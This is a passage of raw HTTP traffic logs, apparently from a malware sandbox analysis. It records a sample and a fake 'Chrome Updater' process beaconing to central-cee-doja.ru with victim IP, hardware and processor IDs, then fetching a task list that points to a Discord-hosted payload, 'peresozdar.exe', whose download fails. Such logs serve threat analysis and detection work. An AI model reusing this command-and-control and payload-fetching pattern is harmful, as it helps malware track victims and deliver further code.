                                                                                    2024-01-04 07:30:59 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:00 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JWz6pTHk4dVQDEQ2tw6MN2Xpvxcb%2FMFc831U%2BTXPRjZv26SmhG1k8LN9XeOuJtEBl5iaq40NJrzLCAZPK5jIjiTgXsXLKTpINsgHaRsCu9iZU%2FsfSMQFcj9jIqWH%2FkITbo4T2Kk6"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c783ff0c81f9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:00 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    125192.168.2.649848104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:59 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:00 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8Mig%2BdOhC%2BOch1DeCUPwBwfpEAC4L5IrXZgksaCO3da%2BdZVxYO6HVRfTa2HJUQ7tIvyNxfnMsU9dmrKAa7KrM8W5gnjUInpzzrOL3RAtlvvXe4bW2xEXV%2F01zztFEvcOnQ6FBkxq"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c785e8093897-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:00 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    126192.168.2.649849104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:00 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:01 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nJlNRcxS6Siisv5zHZyaDWf%2BsUIUH0sL%2BqdomUw%2BsgOKZdKiEJQexMfFuD9K5Z7%2B3pqEvUlUZawBxe%2BkwKUpWJQULrCGNQqQXHpwQGBJuCxJnvrMg3jDuXt6ZC6nQ9xfqVUjteSA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7884cfe821a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:01 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    127192.168.2.649850104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:00 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:01 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4iXuht0%2FMxjR6Bx0BpDg8co3hb2yXON9u7f4HLh0C3KHU4Z5Q%2FkXF02TN%2BPRifw9sr4k537yiQEKDIJYg4leQcn0M2aqEG7qLX%2B9illUKFVflqYy457eoeaosL1oVp06gdaY%2BD1N"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c78a3cac820e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:01 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    128192.168.2.649851162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:01 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:01 UTC1350INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:01 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c78dcd788f0a-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 23
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:01 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=preXhIOTj8j3bV_3yVzSkSVM95JdJQOberMpFoqCGpQ-1704353461-1-AahOjIjM0i36TF9BZHWumYymP5osjyJukOBnVw+Rf2NYTBoIQez0V9medmTPLnnbM5NREVH/5cTTm0nI1wbPakc=; path=/; expires=Thu, 04-Jan-24 08:01:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tizwvozQvvucMQ4Nl4G3oXQWQX%2FgCFtX%2FkIrmBd1gCXe%2FX%2BZqtMUb%2FnrRCC76jilqUicmmqsa%2BSHPnmrSzzKIexmKThcg1r17cvj7Q%2F%2Fuym5dweWbRV35YhkuN2Nr3yrNQxKAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=Z33fS1TWLwHH.sdcQFAMvqdJg1GHcxC8MR04Ap1cJKg-1704353461430-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:01 UTC19INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27
                                                                                    Data Ascii: <?xml version='1.0'
                                                                                    2024-01-04 07:31:01 UTC217INData Raw: 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    129192.168.2.649852162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:01 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:01 UTC1342INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:01 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c78fae4f6ff1-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 34
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:01 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=CSRitRGcLnoGUk82RHHBqOMGILWb_VorWWSrh1bQqes-1704353461-1-Ad+7ilCCjIW/POuuvvfi+53ISHyaNU0KnBlRRnEdr2eU58DP/t4yS+RsQ950Eq5m5vPPhvD+Xw/9abQbalwtc88=; path=/; expires=Thu, 04-Jan-24 08:01:01 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tHB6xjWMONH%2BaMEwWSETPZjnk6P0eofTx1AUw7WC9SxvHHDwKV8zjHOnTVcBrh4HE%2FajIg8XLybmhcOo0kBEnG4b0KfBCK2Ck%2BzAxjt7ycDxusinmVvaaWLwZ7EVGBq%2BMEGO4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=taCry0q8.k4J.rzULP3nAACYsIcvuuCdZvob8aobMhQ-1704353461732-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:01 UTC27INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e
                                                                                    Data Ascii: <?xml version='1.0' encodin
                                                                                    2024-01-04 07:31:01 UTC209INData Raw: 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: g='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    130192.168.2.649853104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:01 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:02 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:02 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QNJLyE8KL%2BrnEXyIS3ZPUedZj%2BD%2FxO1Vhbri7C0VEPNg4avMRvMxc5chk7E8j%2FQj7yb55cinXBVt%2BgEikYoevTRiTvTGM7feBCpMhOn2cjhaon0THBwOMFF%2FHP4jvQNXpdTPe3iM"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7919ebe3b89-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:02 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    131192.168.2.649854104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:02 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:02 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:02 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=riT04bpgK2WZ3BzNy4oYU%2BGnxqs6hKJxoTjbkcw3jo6j6VgpxPZLCg8RiSYKHbtNV5emzNNGhQZWb%2Bw4Hlfk%2BXYqW48dFCWQu1onnOPyzeAIhZPVlUbG8pt%2B7FSNpKIMR9nuf4tW"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7936c932424-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:02 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    132192.168.2.649855104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:02 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:03 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nW8dxF0clDpj4afSRdXIBmwb5gTbEaPS3B0B%2B1hr2e5iEaCOv3coATYndDGUPK23kurLba190hczCOOOEb4EJlDMGyg9uMLbuXdF5x7xNjKG3xHqSo7YsT%2FZO9gt8M1GtCCvtwi6"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7979a713b74-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:03 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    133192.168.2.649856104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:03 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:03 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t24y6RRRqrrkvxx9NHv%2Fpt%2FPpWHEiqwhRUT1tiHcKKmPihUfGIhAPbf%2Fjxm8eNjJhQsSdDcoTg%2BiTbs6ZwNb7u6%2FPmu4XaNAT4jtZTswqHyixPmT%2Bb3dDa%2B2GjKJAS9T9OVYJfFA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c799cb798215-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:03 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    134192.168.2.649857104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:05 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:05 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kpIT7Qva2bRjTQewrjCuWwykyzOizp9qUdE2InEL3MNsrfTNrDEAio%2BIUWtR96NffqgwL2xSXaPtP%2BdHQpwtOw1bQ%2FQypiaPIrVzAITakyeU6rgDydLxBgDPp8tCXeA3%2BSEcmwrA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7a77e8c5979-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:05 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    135192.168.2.649858162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:05 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:05 UTC1348INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:05 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7a7ceb66f9b-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 38
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:05 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=QioupIIiWihXW9oRlWwqOlWKfYDgYJDZiKdsbeUh1zw-1704353465-1-AaTL9Dyq60g8SrzmAs2U12OHGtl5RmAbvt2mnSpt1vQTlFbi5Dp4aUxtnngW0K1aGbFd8IdO5c/Ww3Isg2Ye4AQ=; path=/; expires=Thu, 04-Jan-24 08:01:05 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B5HHkFtyPZGd8%2F9tH1Rp5cWgtOXver%2FEJrQFw4h72zAzWvrtt9cxoF7I1lBfCiu13pEmn%2BNYUi0niUYuRkVx%2FJUpl%2Ff9mZDbFg%2Buf4NZ5RiV9clLcviqjXNMIWuvEH2QaqAy1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=kKbyUJ32_6BPHmO4sQdCdUXNZEiW3XqcM4IQClBwulg-1704353465589-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:05 UTC21INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65
                                                                                    Data Ascii: <?xml version='1.0' e
                                                                                    2024-01-04 07:31:05 UTC215INData Raw: 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ncoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    136192.168.2.649859104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:05 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:06 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:06 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
